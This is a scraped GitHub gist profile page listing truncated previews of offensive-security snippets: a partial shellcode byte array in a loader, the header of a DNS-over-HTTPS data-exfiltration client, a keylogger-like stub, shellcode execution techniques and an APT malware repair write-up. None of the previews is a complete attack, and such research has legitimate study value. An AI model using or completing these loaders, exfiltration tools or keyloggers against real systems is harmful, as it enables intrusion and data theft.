Skip to content

Instantly share code, notes, and snippets.

View 0xHossam's full-sized avatar
🫠
just chilling, i guess

Hossam Ehab 0xHossam

🫠
just chilling, i guess
View GitHub Profile
@AlloySecureGroup
AlloySecureGroup / Enumerate-UrlSchemes.ps1
Last active July 15, 2026 09:45
Scheme Hunter - Enumerate URI schemes and prototype invocation
<#
.SYNOPSIS
Enumerates all registered URI/URL protocol handlers ("schemes") on a
Windows endpoint and statically risk-scores them for potential
execution-primitive abuse (cf. search-ms:, ms-officecmd:, and similar
scheme-hijack findings).
.DESCRIPTION
Does NOT invoke any handler. Purely reads HKEY_CLASSES_ROOT and
HKEY_CURRENT_USER\Software\Classes for keys that carry the
@daaximus
daaximus / windows-11-ioctls.cpp
Last active March 12, 2026 06:16
Windows 11 26100 All IOCTL List
; ioctl codes extracted
; daax (2026) -- win 11 26100
;
#pragma once
#include <stdint.h>
typedef struct _ioctl_t {
const char* ioctl_name;

Fixing an APT sample so it can work on Modern Windows versions - An Exercise in Reverse Engineering

Sample

I stumbled upon an old miniduke APT malware, and found that it has some cool tricks, while I won't be explaining how the malware works or what it even does, I will be focusing on showing a code flaw in the sample, that was the reason for a crash that I found while debugging it on Windows 10, as well as showing how we can fix it, that requires some amount of reverse engineering and coding (I will use C & Assembly).

But to give you a quick introduction, that sample comes as 32-bit DLL file, with one export with name 'JorPglt', which is the start of payload, the sample also employs few simple (code mutation / instruction-level obfuscations) that we will discuss as well.

So without getting into much details here is where the code flaw resides

import argparse
import datetime
import logging
import os
import random
import struct
import sys
from binascii import hexlify, unhexlify
from six import ensure_binary
@whokilleddb
whokilleddb / JasonToddIsTheBestRobin.c
Created August 21, 2025 22:51
Unnecessarily complicated way of controlling shellcode execution using InternetStatusCallback()
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#pragma comment(lib, "wininet.lib")
// notepad.exe shellcode
char shellcode[] = {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,
0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52,
// author: daax
// 0x4a65 = 19045 (windows version)
int main()
{
PSAPI_WORKING_SET_INFORMATION* w = ( PSAPI_WORKING_SET_INFORMATION* ) malloc( 1 << 20 );
QueryWorkingSet( GetCurrentProcess(), w, 1 << 20 );
for ( u32 i = 0; i < w->NumberOfEntries; i++ )
if ( ( w->WorkingSetInfo[ i ].Flags & 31 ) == 4 )
for ( u8* p = ( u8* ) ( ( w->WorkingSetInfo[ i ].Flags >> 12 ) << 12 ),
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "winmm.lib")
void Nothing(WORD wKey)
{
}
void PrintKey(WORD wKey)
@0xHossam
0xHossam / client.py
Last active June 24, 2026 09:54
Data Exfiltration Using DNS over HTTPS (DoH) for HTTPS POST Requests & Sending Data in Chunks
# Info: Stealthy Data Exfiltration Using (DoH) - Client Code
# Date: May 26, 2024
# Author: Hossam
import os, glob, requests, logging, struct, base64, random, time, httpx
from datetime import datetime
import urllib3
import win32com.client
from colorama import Fore, Style, init
from cryptography.fernet import Fernet
@RistBS
RistBS / shellcode_exec_workerfactory.c
Last active April 23, 2025 19:32
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@susMdT
susMdT / Program.cs
Created March 1, 2023 18:55
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)